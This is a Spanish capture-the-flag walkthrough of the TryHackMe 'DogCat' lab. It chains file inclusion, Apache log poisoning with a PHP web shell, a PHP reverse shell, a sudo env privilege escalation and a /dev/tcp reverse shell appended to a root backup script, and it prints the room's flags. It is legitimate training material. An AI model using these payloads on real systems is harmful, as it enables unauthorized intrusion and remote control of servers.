THM - DogCat - HackMD

## Escanedo de puertos ~~~shell sudo nmap -p- --open --min-rate 3500 -Pn -n $IP -oG open-port ~~~ ~~~shell cat open-port | grep -oP '\d{1,5}/open' | cut -d / -f1 | xargs | tr ' ' ',' | xclip -sel clip ~~~ ~~~shell #Misma utilidad pero para utilizarlo en forma de comando extractPorts () { ports="$(cat $1 | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" ip_address="$(cat $1 | grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' | sort -u | head -n 1)" echo -e "\n[*] Extracting information...\n" > extractPorts.tmp echo -e "\t[*] IP Address: $ip_address" >> extractPorts.tmp echo -e "\t[*] Open ports: $ports\n" >> extractPorts.tmp echo $ports | tr -d '\n' | xclip -sel clip echo -e "[*] Ports copied to clipboard\n" >> extractPorts.tmp bat extractPorts.tmp #Requiere tener instalada la herramienta bat rm extractPorts.tmp } ~~~ ~~~shell nmap -sCV -p22,80 $IP -oN version-port ~~~ ~~~shell $ whatweb $IP http://10.10.168.218 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[10.10.168.218], PHP[7.4.3], Title[dogcat], X-Powered-By[PHP/7.4.3] ~~~ ~~~shell cd /usr/share/wordlist/ wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/directory-list-2.3-medium.txt gobuster dir -u htttp://$IP -w /usr/share/wordlist/directory-list-2.3-medium.txt ~~~ <https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/directory-list-2.3-medium.txt> ~~~shell $ curl http://10.10.168.218 <!DOCTYPE HTML> <html> <head> <title>dogcat</title> <link rel="stylesheet" type="text/css" href="/style.css"> </head> <body> <h1>dogcat</h1> <i>a gallery of various dogs or cats</i> <div> <h2>What would you like to see?</h2> <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br> </div> </body> </html> ~~~ ~~~shell $ curl http://$IP/?view=cat <!DOCTYPE HTML> <html> <head> <title>dogcat</title> <link rel="stylesheet" type="text/css" href="/style.css"> </head> <body> <h1>dogcat</h1> <i>a gallery of various dogs or cats</i> <div> <h2>What would you like to see?</h2> <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br> Here you go!<img src="cats/6.jpg" /> </div> </body> </html> ~~~ ~~~shell ~~~ <https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phpfilter> ~~~shell $ curl http://example.com/index.php?page=php://filter/convert.base64-encode/resource=dogs/../index.php ~~~ ~~~shell nano index ~~~ ~~~shell cat index | base64 -d | sponge index ~~~ ~~~shell ffuf -u http://$IP/FUZZ.php -w /usr/share/wordlist/directory-list-2.3-medium.txt -ic ~~~ Wrapper ~~~shell curl "http://$IP/?view=php://filter/convert.base64-encode/resource=dogs/../flag" ~~~ ~~~shell echo "PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo/Pgo=" | base64 -d <?php $flag_1 = "THM{Th1s_1s_N0t_4_Catdog_ab67edfa}" ?> ~~~ ~~~shell $ curl "http://$IP/?view=dog/../../../../var/log/apache2/access.log&ext=" <!DOCTYPE HTML> <html> <head> <title>dogcat</title> <link rel="stylesheet" type="text/css" href="/style.css"> </head> <body> <h1>dogcat</h1> <i>a gallery of various dogs or cats</i> <div> <h2>What would you like to see?</h2> <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br> Here you go!127.0.0.1 - - [06/Jul/2023:02:46:00 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0" ... 127.0.0.1 - - [06/Jul/2023:03:17:47 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0" 10.18.41.138 - - [06/Jul/2023:03:17:53 +0000] "GET /?view=php://filter/convert.base64-encode/resource=dogs/../flag HTTP/1.1" 200 703 "-" "curl/7.68.0" 127.0.0.1 - - [06/Jul/2023:03:18:18 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0" 127.0.0.1 - - [06/Jul/2023:03:18:48 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0" 127.0.0.1 - - [06/Jul/2023:03:19:18 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0" 10.18.41.138 - - [06/Jul/2023:03:19:32 +0000] "GET /?view=dog/../../../../var/log/apache2/access.log HTTP/1.1" 200 1024 "-" "curl/7.68.0" 127.0.0.1 - - [06/Jul/2023:03:19:49 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0" </div> </body> </html> ~~~ ~~~shell curl http://$IP -H "User-Agent:" ~~~ ~~~shell $ curl "http://$IP/?view=dog/../../../../var/log/apache2/access.log&ext=" ... 127.0.0.1 - - [06/Jul/2023:03:31:25 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0" 127.0.0.1 - - [06/Jul/2023:03:31:55 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0" 127.0.0.1 - - [06/Jul/2023:03:32:26 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0" 10.18.41.138 - - [06/Jul/2023:03:32:36 +0000] "GET / HTTP/1.1" 200 615 "-" "-" </div> </body> </html> ~~~ Log poisoning ~~~shell curl http://$IP --user-agent "<?php system(\$_GET['cmd']);?>" ~~~ ~~~shell curl "http://$IP/?view=dog/../../../../var/log/apache2/access.log&ext=" --user-agent "<?php system($_GET['cmd']);?>" ... 127.0.0.1 - - [06/Jul/2023:04:07:13 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0" 127.0.0.1 - - [06/Jul/2023:04:07:44 +0000] "GET / HTTP/1.1" 200 615 "-" "curl/7.64.0" 10.18.41.138 - - [06/Jul/2023:04:07:44 +0000] "GET / HTTP/1.1" 200 615 "-" "cat.php cats dog.php dogs flag.php index.php style.css " 10.18.41.138 - - [06/Jul/2023:04:07:49 +0000] "GET /?view=dog/../../../../var/log/apache2/access.log&ext= HTTP/1.1" 200 25063 "-" "-" </div> </body> ~~~ ## Shell reversa con php <https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet> ~~~shell sudo netcat -nlvp 443 ~~~ ~~~shell $ ip a | grep tun0 7833: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 100 inet 10.18.41.138/17 brd 10.18.127.255 scope global tun0 ~~~ ~~~shell IP2=10.18.41.138 ~~~ ~~~shell curl http://10.10.121.133/?view=dog/../../../../var/log/apache2/access.log&ext=&cmd=php -r '$sock=fsockopen("10.18.41.138",443);exec("/bin/sh -i <&3 >&3 2>&3");' ~~~ ~~~shell curl $'http://10.10.121.133/?view=dog/../../../../var/log/apache2/access.log&ext=&cmd=php+-r+\'$sock%3dfsockopen(\"10.18.41.138\",443)%3bexec(\"/bin/sh+-i+<%263+>%263+2>%263\")%3b\'' ~~~ ~~~shell $ sudo netcat -nlvp 443 [sudo] password for fredy: Listening on 0.0.0.0 443 Connection received on 10.10.121.133 54768 /bin/sh: 0: can't access tty; job control turned off $ tty not a tty $ ~~~ ## Convertir a tty Utilizamos `script /dev/null -c bash` El comando `script /dev/null -c bash` se utiliza para iniciar una nueva sesión de shell interactiva de Bash y redirigir tanto la entrada como la salida a /dev/null, lo que significa que no se muestra ningún resultado en la pantalla ni se guarda en ningún archivo. La utilidad script registra una sesión de terminal, capturando todo lo que se muestra en la pantalla y guardándolo en un archivo de registro. Sin embargo, al especificar /dev/null como archivo de registro, se descarta toda la salida. ~~~shell sudo netcat -nlvp 443 [sudo] password for fredy: Listening on 0.0.0.0 443 Connection received on 10.10.121.133 54768 /bin/sh: 0: can't access tty; job control turned off $ tty not a tty $ script /dev/null -c bash Script started, file is /dev/null www-data@c11e11b1ef6e:/var/www/html$ tty tty /dev/pts/0 www-data@c11e11b1ef6e:/var/www/html$ ~~~ Mandamos a segundo plano con `ctrl+z` y luego ingresamos `stty raw -echo`. * `stty raw -echo`: El comando `stty` se utiliza para cambiar o mostrar la configuración de terminal. En este caso, `raw` configura la terminal en modo "crudo" o "raw", lo que significa que los caracteres se manejarán individualmente sin realizar ningún procesamiento especial. `-echo` desactiva la eco de los caracteres ingresados, lo que evita que se muestren en la pantalla. ~~~shell stty raw -echo; fg ~~~ Notemos que ingresamo el comando `fg` directamente en la misma línea porque no vamos a ver el STDIN en pantalla ~~~shell reset xterm www-data@c11e11b1ef6e:/var/www/html$ ~~~ ## Configurar nuestra nueva terminal ~~~shell uqbar@un$ stty size 34 130 ~~~ ~~~shell www-data@c11e11b1ef6e:/var/www/html$ stty rows 34 columns 130 ~~~ ## Exploracion ¿Estamos un host virtual? ~~~shell www-data@c11e11b1ef6e:/var/www$ uname -a Linux c11e11b1ef6e 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 x86_64 GNU/Linux ~~~ El archivo `/proc/net/fib_trie` es... ~~~shell www-data@c11e11b1ef6e:/var/www$ cat /proc/net/fib_trie | grep -i "host local" -C 1 /32 link BROADCAST /8 host LOCAL |-- 127.0.0.1 /32 host LOCAL |-- 127.255.255.255 -- |-- 172.17.0.2 /32 host LOCAL |-- 172.17.255.255 -- /32 link BROADCAST /8 host LOCAL |-- 127.0.0.1 /32 host LOCAL |-- 127.255.255.255 -- |-- 172.17.0.2 /32 host LOCAL |-- 172.17.255.255 ~~~ ~~~shell www-data@c11e11b1ef6e:/var/www$ ls -al / total 80 drwxr-xr-x 1 root root 4096 Jul 6 02:44 . drwxr-xr-x 1 root root 4096 Jul 6 02:44 .. -rwxr-xr-x 1 root root 0 Jul 6 02:44 .dockerenv drwxr-xr-x 1 root root 4096 Feb 26 2020 bin drwxr-xr-x 2 root root 4096 Feb 1 2020 boot drwxr-xr-x 5 root root 340 Jul 6 02:45 dev drwxr-xr-x 1 root root 4096 Jul 6 02:44 etc drwxr-xr-x 2 root root 4096 Feb 1 2020 home drwxr-xr-x 1 root root 4096 Feb 26 2020 lib drwxr-xr-x 2 root root 4096 Feb 24 2020 lib64 drwxr-xr-x 2 root root 4096 Feb 24 2020 media drwxr-xr-x 2 root root 4096 Feb 24 2020 mnt drwxr-xr-x 1 root root 4096 Jul 6 02:45 opt dr-xr-xr-x 111 root root 0 Jul 6 02:45 proc drwx------ 1 root root 4096 Mar 10 2020 root drwxr-xr-x 1 root root 4096 Feb 26 2020 run drwxr-xr-x 1 root root 4096 Feb 26 2020 sbin drwxr-xr-x 2 root root 4096 Feb 24 2020 srv dr-xr-xr-x 13 root root 0 Jul 6 02:45 sys drwxrwxrwt 1 root root 4096 Mar 10 2020 tmp drwxr-xr-x 1 root root 4096 Feb 24 2020 usr drwxr-xr-x 1 root root 4096 Feb 26 2020 var ~~~ Notemos que existe `.dockerenv` ~~~shell www-data@c11e11b1ef6e:/var/www$ ls -al /opt total 12 drwxr-xr-x 1 root root 4096 Jul 6 02:45 . drwxr-xr-x 1 root root 4096 Jul 6 02:44 .. drwxr-xr-x 2 root root 4096 Apr 8 2020 backups ~~~ ~~~shell www-data@c11e11b1ef6e:/var/www$ ls -al /opt/backups/ total 2892 drwxr-xr-x 2 root root 4096 Apr 8 2020 . drwxr-xr-x 1 root root 4096 Jul 6 02:45 .. -rwxr--r-- 1 root root 69 Mar 10 2020 backup.sh -rw-r--r-- 1 root root 2949120 Jul 6 06:06 backup.tar ~~~ Puertos y conexiones ~~~shell root@c11e11b1ef6e:/var/www# cat /proc/net/tcp sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode 0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 25020 1 0000000000000000 100 0 0 10 0 1: 0100007F:C550 0100007F:0050 06 00000000:00000000 03:00000DE6 00000000 0 0 0 3 0000000000000000 2: 020011AC:0050 8A29120A:C8FE 01 00000000:00000000 02:0004AA44 00000000 33 0 51490 2 0000000000000000 51 4 1 10 8 3: 020011AC:D5F0 8A29120A:01BB 01 00000000:00000000 00:00000000 00000000 33 0 51923 2 0000000000000000 39 4 33 4 4 4: 0100007F:C54E 0100007F:0050 06 00000000:00000000 03:00000214 00000000 0 0 0 3 0000000000000000 ~~~ ## Escalación de privilegios ~~~shell www-data@c11e11b1ef6e:/var/www$ sudo -l Matching Defaults entries for www-data on c11e11b1ef6e: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on c11e11b1ef6e: (root) NOPASSWD: /usr/bin/env ~~~ Notemos que podemos ejectuar `env` como root. ![](https://hackmd.io/_uploads/HyQC50mF2.png) ![](https://hackmd.io/_uploads/SyxzsAXKh.png) ~~~shell www-data@c11e11b1ef6e:/var/www$ sudo env /bin/sh # bash root@c11e11b1ef6e:/var/www# ls ~ flag3.txt root@c11e11b1ef6e:/var/www# cat ~/flag3.txt THM{D1ff3r3nt_3nv1ronments_874112} ~~~ ## Linux process snooping con pspy <https://github.com/DominicBreuker/pspy> ~~~shell root@c11e11b1ef6e:/var/www# ./pspy pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d ██▓███ ██████ ██▓███ ▓██ ██▓ ▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒ ▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░ ▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░ ▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░ ▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒ ░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░ ░░ ░ ░ ░ ░░ ▒ ▒ ░░ ░ ░ ░ ░ ░ Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive) Draining file system events due to startup... done 2023/07/06 06:33:06 CMD: UID=0 PID=2332 | ./pspy 2023/07/06 06:33:06 CMD: UID=0 PID=2035 | bash 2023/07/06 06:33:06 CMD: UID=0 PID=2027 | /bin/sh 2023/07/06 06:33:06 CMD: UID=0 PID=2026 | sudo env /bin/sh 2023/07/06 06:33:06 CMD: UID=33 PID=1520 | bash 2023/07/06 06:33:06 CMD: UID=33 PID=1519 | sh -c bash 2023/07/06 06:33:06 CMD: UID=33 PID=1518 | script /dev/null -c bash 2023/07/06 06:33:06 CMD: UID=33 PID=820 | /bin/sh -i 2023/07/06 06:33:06 CMD: UID=33 PID=819 | sh -c /bin/sh -i <&3 >&3 2>&3 2023/07/06 06:33:06 CMD: UID=33 PID=812 | php -r $sock=fsockopen("10.18.41.149",443);exec("/bin/sh -i <&3 >&3 2>&3"); 2023/07/06 06:33:06 CMD: UID=33 PID=811 | sh -c php -r '$sock=fsockopen("10.18.41.149",443);exec("/bin/sh -i <&3 >&3 2>&3");' 2023/07/06 06:33:06 CMD: UID=33 PID=29 | apache2 -DFOREGROUND 2023/07/06 06:33:06 CMD: UID=33 PID=28 | apache2 -DFOREGROUND 2023/07/06 06:33:06 CMD: UID=33 PID=27 | apache2 -DFOREGROUND 2023/07/06 06:33:06 CMD: UID=33 PID=21 | apache2 -DFOREGROUND 2023/07/06 06:33:06 CMD: UID=33 PID=20 | apache2 -DFOREGROUND 2023/07/06 06:33:06 CMD: UID=33 PID=19 | apache2 -DFOREGROUND 2023/07/06 06:33:06 CMD: UID=33 PID=18 | apache2 -DFOREGROUND 2023/07/06 06:33:06 CMD: UID=33 PID=17 | apache2 -DFOREGROUND 2023/07/06 06:33:06 CMD: UID=0 PID=1 | apache2 -DFOREGROUND 2023/07/06 06:33:36 CMD: UID=0 PID=2345 | runc init 2023/07/06 06:33:36 CMD: UID=0 PID=2350 | /bin/sh -c curl --silent --fail http://127.0.0.1:80/ ~~~ ## Recordemos `/opt/backups/backup.sh` ~~~shell root@c11e11b1ef6e:/var/www# cd /opt/backups/ root@c11e11b1ef6e:/opt/backups# cat backup.sh #!/bin/bash tar cf /root/container/backup/backup.tar /root/container ~~~ ~~~shell uqbar@un$ sudo netcat -nlvp 443 [sudo] password for fredy: Listening on 0.0.0.0 443 ~~~ ~~~shell root@c11e11b1ef6e:/opt/backups# echo "bash -i >& /dev/tcp/10.18.41.138/443 0>&1" >> backup.sh root@c11e11b1ef6e:/opt/backups# cat backup.sh #!/bin/bash tar cf /root/container/backup/backup.tar /root/container bash -i >& /dev/tcp/10.18.41.138/443 0>&1 ~~~ ~~~shell sudo netcat -nlvp 443 Connection received on 10.10.121.133 51062 bash: cannot set terminal process group (28790): Inappropriate ioctl for device bash: no job control in this shell root@dogcat:~# ls container flag4.txt root@dogcat:~# cat flag4.txt THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d} ~~~